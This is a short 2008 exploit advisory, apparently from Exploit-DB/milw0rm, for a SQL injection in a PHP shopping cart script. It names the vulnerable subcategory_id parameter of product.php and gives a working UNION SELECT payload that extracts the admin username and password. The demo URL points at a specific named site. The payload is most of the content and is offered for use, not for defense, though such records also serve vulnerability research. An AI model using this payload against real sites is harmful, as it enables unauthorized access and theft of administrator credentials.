RakhiSoftware Shopping Cart - SQL Injection

EDB-ID:

7250


Author:

XaDoS

Type:

webapps


Platform:

PHP

Date:

2008-11-27


[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection
 
>@.@<

> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> B§g: Remote Sql inJection
> SIte vuln: http://willscript.com/rjbike_new/index.php
 
>@.@<
 

 
[â– ] ExPL0iT:
 
|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]
 
 
 
[■] D£M0:  
 
|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--
 
(you see the username and password of adm in the title of one product)
 
[â– ] Th4nKs::
 
\> str0ke </
\> OnlY me ( no help for this ) ;-) </

# milw0rm.com [2008-11-27]